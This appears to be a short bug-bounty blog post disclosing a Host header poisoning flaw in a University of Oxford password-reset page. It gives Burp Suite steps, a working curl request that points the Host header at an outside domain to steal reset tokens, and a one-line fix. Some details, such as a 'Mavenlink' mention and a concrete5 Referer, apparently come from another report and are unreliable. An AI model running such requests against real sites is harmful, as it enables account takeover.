University of Oxford web Portal Vulnerability -Host header Poisoning

Adesh Kolte
2 min readAug 3, 2019

--

Hi Guyz found a very common Vulnerability in oxford’s web portal

Disclosed report -

Vulnerability Found: Host Header Poisoning

logo

Description :
Modifying the Host header in Mavenlink’s password reset functionality would inject an attacker’s link into the password reset email.
When clicked, this would send the password reset token to the attacker’s server, allowing for the attacker to reset the target’s password.

Vulnerable URL :https://conted.ox.ac.uk/user/request_reset_password

  1. ) Open up Firefox and Burp Suite.)
    2.) Visit the forgot password page (/user/request_reset_password)
    3.) Enter the victim’s email address and click Reset and Email Password
    4.) Intercept the HTTP request in Burp Suite & change the Host Header to your malicious site / server.
Proof of concept

If the victim clicks the link, the reset token will be leaked and the attacker will be able to find the reset token in the server logs. The attacker can then browse to the reset page with the token and change the password of the victim account!

This can also be reproduced using the curl command

curl -i -s -k -X $’POST’ \
-H ‘Host:sxcurity.pro’ -H $’User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0' -H $’Content-Type: application/x-www-form-urlencoded’ -H $’Referer: http://<TARGET>/index.php/login/callback/concrete/forgot_password’ -H $’Upgrade-Insecure-Requests: 1' \
-b $’<COOKIES>’ \
— data-binary $’ccm_token=1494113992%3A02eb0471b7b6e3a498ba7e6b57573b04&uEmail=hacker1337%40gmail.com&resetPassword=’ \
$’https://conted.ox.ac.uk/user/request_reset_password'

FIX and Patches

Use $_SERVER[‘SERVER_NAME’] rather than $_SERVER[‘HTTP_HOST’]

Thanks for reading

--

--

Adesh Kolte

Listed in Top 100 most respected hackers in the world by Microsoft at the BlackHat conference in America 2018